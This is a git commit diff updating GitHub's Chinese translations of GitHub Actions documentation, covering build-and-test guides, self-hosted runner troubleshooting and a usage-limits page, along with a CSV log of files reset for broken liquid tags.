New translation batch for cn (#26164)

* Add crowdin translations * Run script/i18n/homogenize-frontmatter.js * Run script/i18n/lint-translation-files.js --check parsing * Run script/i18n/lint-translation-files.js --check rendering * run script/i18n/reset-files-with-broken-liquid-tags.js --language=cn * run script/i18n/reset-known-broken-translation-files.js * Check in cn CSV report Co-authored-by: Robert Sese <rsese@github.com>
2026-01-22 09:02:55 -05:00 · 2022-03-14 13:32:54 -07:00
parent 80d7fea355
commit 70a0e39b4e
28 changed files with 364 additions and 313 deletions
--- a/translations/log/cn-resets.csv
+++ b/translations/log/cn-resets.csv
@@ -14,8 +14,10 @@ translations/zh-CN/content/actions/hosting-your-own-runners/adding-self-hosted-r
 translations/zh-CN/content/actions/hosting-your-own-runners/adding-self-hosted-runners.md,broken liquid tags
 translations/zh-CN/content/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners.md,Listed in localization-support#489
 translations/zh-CN/content/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners.md,broken liquid tags
+translations/zh-CN/content/actions/learn-github-actions/usage-limits-billing-and-administration.md,broken liquid tags
 translations/zh-CN/content/actions/managing-workflow-runs/removing-workflow-artifacts.md,broken liquid tags
 translations/zh-CN/content/actions/managing-workflow-runs/reviewing-deployments.md,Listed in localization-support#489
+translations/zh-CN/content/actions/security-guides/security-hardening-for-github-actions.md,broken liquid tags
 translations/zh-CN/content/actions/using-github-hosted-runners/about-github-hosted-runners.md,broken liquid tags
 translations/zh-CN/content/actions/using-workflows/storing-workflow-data-as-artifacts.md,broken liquid tags
 translations/zh-CN/content/admin/code-security/managing-github-advanced-security-for-your-enterprise/configuring-code-scanning-for-your-appliance.md,broken liquid tags
@@ -217,6 +219,7 @@ translations/zh-CN/content/rest/overview/other-authentication-methods.md,Listed
 translations/zh-CN/content/rest/overview/other-authentication-methods.md,broken liquid tags
 translations/zh-CN/content/rest/overview/resources-in-the-rest-api.md,Listed in localization-support#489
 translations/zh-CN/content/rest/reference/enterprise-admin.md,broken liquid tags
+translations/zh-CN/content/search-github/getting-started-with-searching-on-github/about-searching-on-github.md,broken liquid tags
 translations/zh-CN/content/sponsors/getting-started-with-github-sponsors/about-github-sponsors.md,broken liquid tags
 translations/zh-CN/content/sponsors/receiving-sponsorships-through-github-sponsors/about-github-sponsors-for-open-source-contributors.md,broken liquid tags
 translations/zh-CN/content/support/contacting-github-support/creating-a-support-ticket.md,broken liquid tags
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-ant.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-ant.md
@@ -40,11 +40,11 @@ shortTitle: 构建和测试 Java & Ant

 {% data reusables.actions.enterprise-setup-prereq %}

-## Using the Ant starter workflow
+## 使用 Ant 入门工作流程

-{% data variables.product.prodname_dotcom %} provides an Ant starter workflow that will work for most Ant-based Java projects. For more information, see the [Ant starter workflow](https://github.com/actions/starter-workflows/blob/main/ci/ant.yml).
+{% data variables.product.prodname_dotcom %} 提供有 Ant 入门工作流程，适用于大多数基于 Ant 的 Java 项目。 更多信息请参阅 [Ant 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/ant.yml)。

-To get started quickly, you can choose the preconfigured Ant starter workflow when you create a new workflow. 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。
+要快速开始，您可以在创建新工作流程时选择预配置的 Ant 入门工作流程。 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。

 您也可以通过在仓库的 `.github/workflow` 目录中创建新文件来手动添加此工作流程。

@@ -76,7 +76,7 @@ jobs:
 2. `setup-java` 步骤配置 Adoptium 的 Java 11 JDK。
 3. “使用 Ant 构建”步骤以非交互模式运行 `build.xml` 中的默认目标。

-在创建构建和测试工作流程时，默认初学者工作流程是很好的起点，然后您可以自定义初学者工作流程以满足项目的需求。
+在创建构建和测试工作流程时，默认入门工作流程是很好的起点，然后您可以自定义入门工作流程以满足项目的需求。

 {% data reusables.actions.example-github-runner %}

@@ -88,7 +88,7 @@ jobs:

 初学者工作流程将运行 _build.xml_ 文件中指定的默认目标。  默认目标通常设置为将类、运行测试和包类设置为其可分发格式，例如 JAR 文件。

-如果使用不同的命令来构建项目，或者想要运行不同的目标，则可以指定这些命令。 For example, you may want to run the `jar` target that's configured in your `_build-ci.xml_` file.
+如果使用不同的命令来构建项目，或者想要运行不同的目标，则可以指定这些命令。 例如，您可能想要运行在 `_build-ci.xml_` 文件中配置的 `jar` 目标。

 {% raw %}
 ```yaml{:copy}
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-gradle.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-gradle.md
@@ -40,11 +40,11 @@ shortTitle: 构建和测试 Java & Gradle

 {% data reusables.actions.enterprise-setup-prereq %}

-## 使用 Gradle 初学者工作流程
+## 使用 Gradle 入门工作流程

-{% data variables.product.prodname_dotcom %} 提供有 Gradle 初学者工作流程，适用于大多数基于 Gradle 的 Java 项目。 更多信息请参阅 [Gradle 初学者工作流程](https://github.com/actions/starter-workflows/blob/main/ci/gradle.yml)。
+{% data variables.product.prodname_dotcom %} 提供有 Gradle 入门工作流程，适用于大多数基于 Gradle 的 Java 项目。 更多信息请参阅 [Gradle 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/gradle.yml)。

-要快速开始，您可以在创建新工作流程时选择预配置的 Gradle 初学者工作流程。 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。
+要快速开始，您可以在创建新工作流程时选择预配置的 Gradle 入门工作流程。 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。

 您也可以通过在仓库的 `.github/workflow` 目录中创建新文件来手动添加此工作流程。

@@ -81,7 +81,7 @@ jobs:
 3. “验证 Gradle 包装器”步骤验证源树中存在的 Gradle Wrapper JAR 文件的校验和。
 4. “使用 Gradle 构建”步骤使用 Gradle 组织在 {% data variables.product.prodname_dotcom %}上提供的 `gradle/gradle-build-action` 操作进行构建。 该操作负责调用 Gradle、收集结果以及在作业之间缓存状态。 更多信息请参阅 [`gradle/gradle-build-action`](https://github.com/gradle/gradle-build-action)。

-在创建构建和测试工作流程时，默认初学者工作流程是很好的起点，然后您可以自定义初学者工作流程以满足项目的需求。
+在创建构建和测试工作流程时，默认入门工作流程是很好的起点，然后您可以自定义入门工作流程以满足项目的需求。

 {% data reusables.actions.example-github-runner %}

--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-maven.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-java-with-maven.md
@@ -40,11 +40,11 @@ shortTitle: 使用 Maven 构建和测试 Java

 {% data reusables.actions.enterprise-setup-prereq %}

-## 使用 Maven 初学者工作流程
+## 使用 Maven 入门工作流程

-{% data variables.product.prodname_dotcom %} 提供有 Maven 初学者工作流程，适用于大多数基于 Maven 的 Java 项目。 更多信息请参阅 [Maven 初学者工作流程](https://github.com/actions/starter-workflows/blob/main/ci/maven.yml)。
+{% data variables.product.prodname_dotcom %} 提供有 Maven 入门工作流程，适用于大多数基于 Maven 的 Java 项目。 更多信息请参阅 [Maven 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/maven.yml)。

-要快速开始，您可以在创建新工作流程时选择预配置的 Maven 初学者工作流程。 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。
+要快速开始，您可以在创建新工作流程时选择预配置的 Maven 入门工作流程。 更多信息请参阅“[{% data variables.product.prodname_actions %} 快速入门](/actions/quickstart)”。

 您也可以通过在仓库的 `.github/workflow` 目录中创建新文件来手动添加此工作流程。

@@ -76,7 +76,7 @@ jobs:
 2. `setup-java` 步骤配置 Adoptium 的 Java 11 JDK。
 3. “使用 Maven 构建”步骤以非交互模式运行 Maven `package` 目标，以确保创建代码版本、测试通行证和软件包。

-在创建构建和测试工作流程时，默认初学者工作流程是很好的起点，然后您可以自定义初学者工作流程以满足项目的需求。
+在创建构建和测试工作流程时，默认入门工作流程是很好的起点，然后您可以自定义入门工作流程以满足项目的需求。

 {% data reusables.actions.example-github-runner %}

--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-net.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-net.md
@@ -18,7 +18,7 @@ shortTitle: 构建和测试 .NET

 本指南介绍如何构建、测试和发布 .NET 包。

-{% ifversion ghae %} To build and test your .NET project on {% data variables.product.prodname_ghe_managed %}, the .NET Core SDK is required. {% data reusables.actions.self-hosted-runners-software %}
+{% ifversion ghae %} 若要在 {% data variables.product.prodname_ghe_managed %} 上构建和测试 .NET 项目，需要 .NET Core SDK。 {% data reusables.actions.self-hosted-runners-software %}
 {% else %} {% data variables.product.prodname_dotcom %} 托管的运行器有工具缓存预安装的软件，包括 .NET Core SDK。 有关最新版软件以及 .NET Core SDK 预安装版本的完整列表，请参阅 [{% data variables.product.prodname_dotcom %} 自托管运行器上安装的软件](/actions/reference/specifications-for-github-hosted-runners)。
 {% endif %}

@@ -28,11 +28,11 @@ shortTitle: 构建和测试 .NET

 建议您对 .NET Core SDK 有个基本的了解。 更多信息请参阅“[开始使用 .NET](https://dotnet.microsoft.com/learn)”。

-## Using the .NET starter workflow
+## 使用 .NET 入门工作流程

-{% data variables.product.prodname_dotcom %} provides a .NET starter workflow that should work for most .NET projects, and this guide includes examples that show you how to customize this starter workflow. For more information, see the [.NET starter workflow](https://github.com/actions/setup-dotnet).
+{% data variables.product.prodname_dotcom %} 提供有 .NET 入门工作流程，应适合大多数 .NET 项目，本指南包括演示如何自定义此入门工作流程的示例。 更多信息请参阅 [.NET 入门工作流程](https://github.com/actions/setup-dotnet)。

-要快速开始，请将初学者工作流程添加到仓库的 `.github/workflows` 目录中。
+要快速开始，请将入门工作流程添加到仓库的 `.github/workflows` 目录中。

 {% raw %}

@@ -229,7 +229,7 @@ jobs:

 ## 发布到包注册表

-You can configure your workflow to publish your .NET package to a package registry when your CI tests pass. 您可以使用仓库机密来存储发布二进制文件所需的任何令牌或凭据。 下面的示例使用 `dotnet core cli`创建并发布软件包到 {% data variables.product.prodname_registry %}。
+您可以配置工作流程在 CI 测试通过后将 .NET 包发布到包注册表。 您可以使用仓库机密来存储发布二进制文件所需的任何令牌或凭据。 下面的示例使用 `dotnet core cli`创建并发布软件包到 {% data variables.product.prodname_registry %}。

 ```yaml
 name: Upload dotnet package
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-nodejs.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-nodejs.md
@@ -36,11 +36,11 @@ hasExperimentalAlternative: true

 {% data reusables.actions.enterprise-setup-prereq %}

-## Using the Node.js starter workflow
+## 使用 Node.js 入门工作流程

-{% data variables.product.prodname_dotcom %} provides a Node.js starter workflow that will work for most Node.js projects. This guide includes npm and Yarn examples that you can use to customize the starter workflow. For more information, see the [Node.js starter workflow](https://github.com/actions/starter-workflows/blob/main/ci/node.js.yml).
+{% data variables.product.prodname_dotcom %} 提供有 Node.js 入门工作流程，该工作流程将适用于大多数 Node.js 项目。 本指南包含可用于自定义入门工作流程的 npm 和 Yarn 示例。 更多信息请参阅 [Node.js 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/node.js.yml)。

-要快速开始，请将初学者工作流程添加到仓库的 `.github/workflows` 目录中。 下面显示的工作流假定仓库的默认分支是 `main`。
+要快速开始，请将入门工作流程添加到仓库的 `.github/workflows` 目录中。 下面显示的工作流假定仓库的默认分支是 `main`。

 {% raw %}
 ```yaml{:copy}
@@ -81,9 +81,9 @@ jobs:

 `setup-node` 操作采用 Node.js 版本作为输入，并在运行器上配置该版本。 `setup-node` 操作从每个运行器上的工具缓存中查找特定版本的 Node.js，并将必要的二进制文件添加到 `PATH`，这可继续用于作业的其余部分。 使用 `setup-node` 操作是 Node.js 与 {% data variables.product.prodname_actions %} 结合使用时的推荐方式，因为它能确保不同运行器和不同版本的 Node.js 行为一致。 如果使用自托管运行器，则必须安装 Node.js 并将其添加到 `PATH`。

-The starter workflow includes a matrix strategy that builds and tests your code with four Node.js versions: 10.x, 12.x, 14.x, and 15.x. "x" 是一个通配符，与版本的最新次要版本和修补程序版本匹配。 `node-version` 阵列中指定的每个 Node.js 版本都会创建一个运行相同步骤的作业。
+入门工作流程包含一个矩阵策略：用四个 Node.js 版本 10.x、12.x、14.x 和 15.x 构建和测试代码， "x" 是一个通配符，与版本的最新次要版本和修补程序版本匹配。 `node-version` 阵列中指定的每个 Node.js 版本都会创建一个运行相同步骤的作业。

-每个作业都可以使用 `matrix` 上下文访问矩阵 `node-version` 阵列中定义的值。 `setup-node` 操作使用上下文作为 `node-version` 输入。 `setup-node` 操作在构建和测试代码之前使用不同的 Node.js 版本配置每个作业。 For more information about matrix strategies and contexts, see "[Workflow syntax for {% data variables.product.prodname_actions %}](/actions/automating-your-workflow-with-github-actions/workflow-syntax-for-github-actions#jobsjob_idstrategymatrix)" and "[Contexts](/actions/learn-github-actions/contexts)."
+每个作业都可以使用 `matrix` 上下文访问矩阵 `node-version` 阵列中定义的值。 `setup-node` 操作使用上下文作为 `node-version` 输入。 `setup-node` 操作在构建和测试代码之前使用不同的 Node.js 版本配置每个作业。 有关矩阵策略和上下文的更多信息，请参阅“[{% data variables.product.prodname_actions %} 的工作流程语法](/actions/automating-your-workflow-with-github-actions/workflow-syntax-for-github-actions#jobsjob_idstrategymatrix)”和“[上下文](/actions/learn-github-actions/contexts)”。

 {% raw %}
 ```yaml{:copy}
@@ -287,7 +287,7 @@ steps:
 - run: pnpm test
 ```

-If you have a custom requirement or need finer controls for caching, you can use the [`cache` action](https://github.com/marketplace/actions/cache). 更多信息请参阅“<a href="/actions/guides/caching-dependencies-to-speed-up-workflows" class="dotcom-only">缓存依赖项以加快工作流程</a>”。
+如果您有自定义要求或需要更精确的缓存控制，则可以使用 [`cache` 操作](https://github.com/marketplace/actions/cache)。 更多信息请参阅“<a href="/actions/guides/caching-dependencies-to-speed-up-workflows" class="dotcom-only">缓存依赖项以加快工作流程</a>”。

 ## 构建和测试代码

--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-python.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-python.md
@@ -42,11 +42,11 @@ hasExperimentalAlternative: true

 {% data reusables.actions.enterprise-setup-prereq %}

-## 使用 Python 初学者工作流程
+## 使用 Python 入门工作流程

-{% data variables.product.prodname_dotcom %} 提供了一个适用于大多数 Python 项目的 Python 初学者工作流程。 本指南包含可用于自定义初学者工作流程的示例。 更多信息请参阅 [Python 初学者工作流程](https://github.com/actions/starter-workflows/blob/main/ci/python-package.yml)。
+{% data variables.product.prodname_dotcom %} 提供了一个适用于大多数 Python 项目的 Python 入门工作流程。 本指南包含可用于自定义入门工作流程的示例。 更多信息请参阅 [Python 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/python-package.yml)。

-要快速开始，请将初学者工作流程添加到仓库的 `.github/workflows` 目录中。
+要快速开始，请将入门工作流程添加到仓库的 `.github/workflows` 目录中。

 {% raw %}
 ```yaml{:copy}
@@ -298,7 +298,7 @@ steps:

 默认情况下， `setup-python` 操作会在整个存储库中搜索依赖项文件（对于 pip 为`requirements.txt`，对于 pipenv 为 `Pipfile.lock`）。 更多信息请参阅 `setup-python` 操作自述文件中的“<a href="/actions/guides/caching-dependencies-to-speed-up-workflows" class="dotcom-only">缓存包依赖项</a>”。 

-If you have a custom requirement or need finer controls for caching, you can use the [`cache` action](https://github.com/marketplace/actions/cache). Pip 根据运行器的操作系统将依赖项缓存在不同的位置。 您需要缓存的路径可能不同于上面的 Ubuntu 示例，具体取决于您使用的操作系统。 更多信息请参阅 `cache` 操作存储库中的 [Python 缓存示例](https://github.com/actions/cache/blob/main/examples.md#python---pip)。
+如果您有自定义要求或需要更精确的缓存控制，则可以使用 [`cache` 操作](https://github.com/marketplace/actions/cache)。 Pip 根据运行器的操作系统将依赖项缓存在不同的位置。 您需要缓存的路径可能不同于上面的 Ubuntu 示例，具体取决于您使用的操作系统。 更多信息请参阅 `cache` 操作存储库中的 [Python 缓存示例](https://github.com/actions/cache/blob/main/examples.md#python---pip)。



@@ -497,4 +497,4 @@ jobs:
 ```


-有关初学者工作流程的更多信息，请参阅 [`python-published`](https://github.com/actions/starter-workflows/blob/main/ci/python-publish.yml)。
+有关入门工作流程的更多信息，请参阅 [`python-published`](https://github.com/actions/starter-workflows/blob/main/ci/python-publish.yml)。
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-ruby.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-ruby.md
@@ -29,11 +29,11 @@ shortTitle: 构建和测试Ruby
 - [了解 {% data variables.product.prodname_actions %}](/actions/learn-github-actions)
 - [Ruby 20 分钟](https://www.ruby-lang.org/en/documentation/quickstart/)

-## Using the Ruby starter workflow
+## 使用 Ruby 入门工作流程

-{% data variables.product.prodname_dotcom %} provides a Ruby starter workflow that will work for most Ruby projects. For more information, see the [Ruby starter workflow](https://github.com/actions/starter-workflows/blob/master/ci/ruby.yml).
+{% data variables.product.prodname_dotcom %} 提供有 Ruby 入门工作流程，该工作流程将适用于大多数 Ruby 项目。 更多信息请参阅 [Ruby 入门工作流程](https://github.com/actions/starter-workflows/blob/master/ci/ruby.yml)。

-要快速开始，请将初学者工作流程添加到仓库的 `.github/workflows` 目录中。 下面显示的工作流假定仓库的默认分支是 `main`。
+要快速开始，请将入门工作流程添加到仓库的 `.github/workflows` 目录中。 下面显示的工作流假定仓库的默认分支是 `main`。

 ```yaml
 {% data reusables.actions.actions-not-certified-by-github-comment %}
@@ -87,7 +87,7 @@ steps:

 ## 使用多个版本的 Ruby 进行测试

-您可以添加矩阵策略，以在多个版本的 Ruby 上运行工作流程。 For example, you can test your code against the latest patch releases of versions 3.1, 3.0, and 2.7.
+您可以添加矩阵策略，以在多个版本的 Ruby 上运行工作流程。 例如，您可以根据版本 3.1、3.0 和 2.7 的最新修补程序版本测试代码。

 {% raw %}
 ```yaml
@@ -97,7 +97,7 @@ strategy:
 ```
 {% endraw %}

-`ruby-version` 阵列中指定的每个 Ruby 版本都会创建一个运行相同步骤的作业。 {% raw %}`${{ matrix.ruby-version }}`{% endraw %} 上下文用于访问当前作业的版本。 For more information about matrix strategies and contexts, see "[Workflow syntax for {% data variables.product.prodname_actions %}](/actions/learn-github-actions/workflow-syntax-for-github-actions)" and "[Contexts](/actions/learn-github-actions/contexts)."
+`ruby-version` 阵列中指定的每个 Ruby 版本都会创建一个运行相同步骤的作业。 {% raw %}`${{ matrix.ruby-version }}`{% endraw %} 上下文用于访问当前作业的版本。 有关矩阵策略和上下文的更多信息，请参阅“[{% data variables.product.prodname_actions %} 的工作流程语法](/actions/learn-github-actions/workflow-syntax-for-github-actions)”和“[上下文](/actions/learn-github-actions/contexts)”。

 包含矩阵策略的完整更新工作流程可能看起如下：

@@ -238,7 +238,7 @@ jobs:

 ## 嵌入代码

-下面的示例安装 `rubocop` 并用它来嵌入所有文件。 For more information, see [RuboCop](https://github.com/rubocop-hq/rubocop). 您可以[配置 Rubocop](https://docs.rubocop.org/rubocop/configuration.html) 来决定特定的嵌入规则。
+下面的示例安装 `rubocop` 并用它来嵌入所有文件。 更多信息请参阅 [RuboCop](https://github.com/rubocop-hq/rubocop)。 您可以[配置 Rubocop](https://docs.rubocop.org/rubocop/configuration.html) 来决定特定的嵌入规则。

 ```yaml
 {% data reusables.actions.actions-not-certified-by-github-comment %}
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-swift.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/building-and-testing-swift.md
@@ -31,11 +31,11 @@ shortTitle: 构建和测试 Swift

 我们建议您对 Swift 包有基本的了解。 更多信息请参阅 Apple 开发者文档中的“[Swift 包](https://developer.apple.com/documentation/swift_packages)”。

-## 使用 Swift 初学者工作流程
+## 使用 Swift 入门工作流程

-{% data variables.product.prodname_dotcom %} 提供有 Swift 初学者工作流程，应适合大多数 Swift 项目，本指南包括演示如何自定义此初学者工作流程的示例。 更多信息请参阅 [Swift 初学者工作流程](https://github.com/actions/starter-workflows/blob/main/ci/swift.yml)。
+{% data variables.product.prodname_dotcom %} 提供有 Swift 入门工作流程，应适合大多数 Swift 项目，本指南包括演示如何自定义此入门工作流程的示例。 更多信息请参阅 [Swift 入门工作流程](https://github.com/actions/starter-workflows/blob/main/ci/swift.yml)。

-要快速开始，请将初学者工作流程添加到仓库的 `.github/workflows` 目录中。
+要快速开始，请将入门工作流程添加到仓库的 `.github/workflows` 目录中。

 {% raw %}
 ```yaml{:copy}
--- a/translations/zh-CN/content/actions/automating-builds-and-tests/index.md
+++ b/translations/zh-CN/content/actions/automating-builds-and-tests/index.md
@@ -1,7 +1,7 @@
 ---
-title: Automating builds and tests
-shortTitle: Build and test
-intro: 'You can automatically build and test your projects with {% data variables.product.prodname_actions %}.'
+title: 自动构建和测试
+shortTitle: 构建和测试
+intro: '您可以使用 {% data variables.product.prodname_actions %} 自动构建和测试项目。'
 versions:
  fpt: '*'
  ghes: '*'
--- a/translations/zh-CN/content/actions/deployment/about-deployments/deploying-with-github-actions.md
+++ b/translations/zh-CN/content/actions/deployment/about-deployments/deploying-with-github-actions.md
@@ -132,6 +132,8 @@ jobs:
        # ...deployment-specific steps
 ```

+For guidance on writing deployment-specific steps, see "[Finding deployment examples](#finding-deployment-examples)."
+
 ## 查看部署历史记录

 When a {% data variables.product.prodname_actions %} workflow deploys to an environment, the environment is displayed on the main page of the repository. For more information about viewing deployments to environments, see "[Viewing deployment history](/developers/overview/viewing-deployment-history)."
@@ -164,7 +166,7 @@ You can use a status badge to display the status of your deployment workflow. {%

 更多信息请参阅“[添加工作流程状态徽章](/actions/managing-workflow-runs/adding-a-workflow-status-badge)”。

-## 后续步骤
+## Finding deployment examples

 This article demonstrated features of {% data variables.product.prodname_actions %} that you can add to your deployment workflows.

--- a/translations/zh-CN/content/actions/hosting-your-own-runners/about-self-hosted-runners.md
+++ b/translations/zh-CN/content/actions/hosting-your-own-runners/about-self-hosted-runners.md
@@ -197,6 +197,8 @@ You must ensure that the machine has the appropriate network access to communica

 You can also use self-hosted runners with a proxy server. For more information, see "[Using a proxy server with self-hosted runners](/actions/automating-your-workflow-with-github-actions/using-a-proxy-server-with-self-hosted-runners)."

+For more information about troubleshooting common network connectivity issues, see "[Monitoring and troubleshooting self-hosted runners](/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners#troubleshooting-network-connectivity)."
+
 {% ifversion ghes %}

 ## Communication between self-hosted runners and {% data variables.product.prodname_dotcom_the_website %}
--- a/translations/zh-CN/content/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners.md
+++ b/translations/zh-CN/content/actions/hosting-your-own-runners/monitoring-and-troubleshooting-self-hosted-runners.md
@@ -32,7 +32,9 @@ shortTitle: Monitor & troubleshoot
    * **Active**: The runner is currently executing a job.
    * **Offline**: The runner is not connected to {% data variables.product.product_name %}. This could be because the machine is offline, the self-hosted runner application is not running on the machine, or the self-hosted runner application cannot communicate with {% data variables.product.product_name %}.

-## Checking self-hosted runner network connectivity
+## Troubleshooting network connectivity
+
+### Checking self-hosted runner network connectivity

 You can use the self-hosted runner application's `run` script with the `--check` parameter to check that a self-hosted runner can access all required network services on {% data variables.product.product_location %}.

@@ -65,6 +67,27 @@ The script tests each service, and outputs either a `PASS` or `FAIL` for each on

 If you have any failing checks, you should also verify that your self-hosted runner machine meets all the communication requirements. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners#communication-requirements)."

+### Disabling TLS certificate verification
+{% ifversion ghes %}
+By default, the self-hosted runner application verifies the TLS certificate for {% data variables.product.product_name %}.  If your {% data variables.product.product_name %} has a self-signed or internally-issued certificate, you may wish to disable TLS certificate verification for testing purposes.
+{% else %}
+By default, the self-hosted runner application verifies the TLS certificate for {% data variables.product.product_name %}.  If you encounter network problems, you may wish to disable TLS certificate verification for testing purposes.
+{% endif %}
+
+To disable TLS certification verification in the self-hosted runner application, set the `GITHUB_ACTIONS_RUNNER_TLS_NO_VERIFY` environment variable to `1` before configuring and running the self-hosted runner application.
+
+```shell
+export GITHUB_ACTIONS_RUNNER_TLS_NO_VERIFY=1
+./config.sh --url <em>https://github.com/octo-org/octo-repo</em> --token
+./run.sh
+```
+
+{% warning %}
+
+**Warning**: Disabling TLS verification is not recommended since TLS provides privacy and data integrity between the self-hosted runner application and {% data variables.product.product_name %}. We recommend that you install the {% data variables.product.product_name %} certificate in the operating system certificate store for your self-hosted runner. For guidance on how to install the {% data variables.product.product_name %} certificate, check with your operating system vendor.
+
+{% endwarning %}
+
 ## Reviewing the self-hosted runner application log files

 You can monitor the status of the self-hosted runner application and its activities. Log files are kept in the `_diag` directory where you installed the runner application, and a new log is generated each time the application is started. The filename begins with *Runner_*, and is followed by a UTC timestamp of when the application was started.
--- a/translations/zh-CN/content/actions/learn-github-actions/usage-limits-billing-and-administration.md
+++ b/translations/zh-CN/content/actions/learn-github-actions/usage-limits-billing-and-administration.md
@@ -1,6 +1,6 @@
 ---
-title: 使用限制、计费和管理
-intro: '{% data variables.product.prodname_actions %} 工作流程有使用限制。 使用费适用于超出仓库免费分钟数和存储空间量的仓库。'
+title: 'Usage limits, billing, and administration'
+intro: 'There are usage limits for {% data variables.product.prodname_actions %} workflows. Usage charges apply to repositories that go beyond the amount of free minutes and storage for a repository.'
 redirect_from:
  - /actions/getting-started-with-github-actions/usage-and-billing-information-for-github-actions
  - /actions/reference/usage-limits-billing-and-administration
@@ -10,64 +10,64 @@ versions:
  ghec: '*'
 topics:
  - Billing
-shortTitle: 工作流程计费和限制
+shortTitle: Workflow billing & limits
 ---

 {% data reusables.actions.enterprise-beta %}
 {% data reusables.actions.enterprise-github-hosted-runners %}

-## 关于 {% data variables.product.prodname_actions %} 的计费
+## About billing for {% data variables.product.prodname_actions %}

 {% data reusables.repositories.about-github-actions %} For more information, see "[Understanding {% data variables.product.prodname_actions %}](/actions/learn-github-actions/understanding-github-actions){% ifversion fpt %}."{% elsif ghes or ghec %}" and "[About {% data variables.product.prodname_actions %} for enterprises](/admin/github-actions/getting-started-with-github-actions-for-your-enterprise/about-github-actions-for-enterprises)."{% endif %}

 {% ifversion fpt or ghec %}
-{% data reusables.actions.actions-billing %} 更多信息请参阅“[关于 {% data variables.product.prodname_actions %} 的计费](/billing/managing-billing-for-github-actions/about-billing-for-github-actions)”。
+{% data reusables.actions.actions-billing %} For more information, see "[About billing for {% data variables.product.prodname_actions %}](/billing/managing-billing-for-github-actions/about-billing-for-github-actions)."
 {% else %}
-GitHub Actions usage is free for {% data variables.product.prodname_ghe_server %} instances that use self-hosted runners. 更多信息请参阅“[关于自托管运行器](/actions/hosting-your-own-runners/about-self-hosted-runners)”。
+GitHub Actions usage is free for {% data variables.product.prodname_ghe_server %} instances that use self-hosted runners. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners)."
 {% endif %}


 {% ifversion fpt or ghec %}

-## 可用性
+## Availability

 {% data variables.product.prodname_actions %} is available on all {% data variables.product.prodname_dotcom %} products, but {% data variables.product.prodname_actions %} is not available for private repositories owned by accounts using legacy per-repository plans. {% data reusables.gated-features.more-info %}

 {% endif %}

-## 使用限制
+## Usage limits

 {% ifversion fpt or ghec %}
-There are some limits on {% data variables.product.prodname_actions %} usage when using {% data variables.product.prodname_dotcom %}-hosted runners. 这些限制可能会有变动。
+There are some limits on {% data variables.product.prodname_actions %} usage when using {% data variables.product.prodname_dotcom %}-hosted runners. These limits are subject to change.

 {% note %}

-**注：**对于自托管的运行器，适用不同的使用限制。 更多信息请参阅“[关于自托管运行器](/actions/hosting-your-own-runners/about-self-hosted-runners/#usage-limits)”。
+**Note:** For self-hosted runners, different usage limits apply. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners/#usage-limits)."

 {% endnote %}

- **作业执行时间** - 工作流程中的每个作业最多可以运行 6 个小时。 如果作业达到此限制，该作业将会终止而无法完成。
+- **Job execution time** - Each job in a workflow can run for up to 6 hours of execution time. If a job reaches this limit, the job is terminated and fails to complete.
 {% data reusables.actions.usage-workflow-run-time %}
 {% data reusables.actions.usage-api-requests %}
- **并发作业** - 您的帐户中可并发运行的作业数量，具体取决于您的 GitHub 计划，如下表所示。 如果超出，任何额外的作业都会排队。
+- **Concurrent jobs** - The number of concurrent jobs you can run in your account depends on your GitHub plan, as indicated in the following table. If exceeded, any additional jobs are queued.

-  | GitHub 计划 | 同时运行的作业总数 | MacOS 作业同时运行的最大数量 |
-  | --------- | --------- | ----------------- |
-  | 免费        | 20        | 5                 |
-  | Pro       | 40        | 5                 |
-  | 团队        | 60        | 5                 |
-  | 企业        | 180       | 50                |
- **作业矩阵** - {% data reusables.actions.usage-matrix-limits %}
+  | GitHub plan | Total concurrent jobs | Maximum concurrent macOS jobs |
+  |---|---|---|
+  | Free | 20 | 5 |
+  | Pro | 40 | 5 |
+  | Team | 60 | 5 |
+  | Enterprise | 180 | 50 |
+- **Job matrix** - {% data reusables.actions.usage-matrix-limits %}
 {% data reusables.actions.usage-workflow-queue-limits %}

 {% else %}
-使用限制适用于自托管运行器。 更多信息请参阅“[关于自托管运行器](/actions/hosting-your-own-runners/about-self-hosted-runners/#usage-limits)”。
+Usage limits apply to self-hosted runners. For more information, see "[About self-hosted runners](/actions/hosting-your-own-runners/about-self-hosted-runners/#usage-limits)."
 {% endif %}

 {% ifversion fpt or ghec %}
-## 使用策略
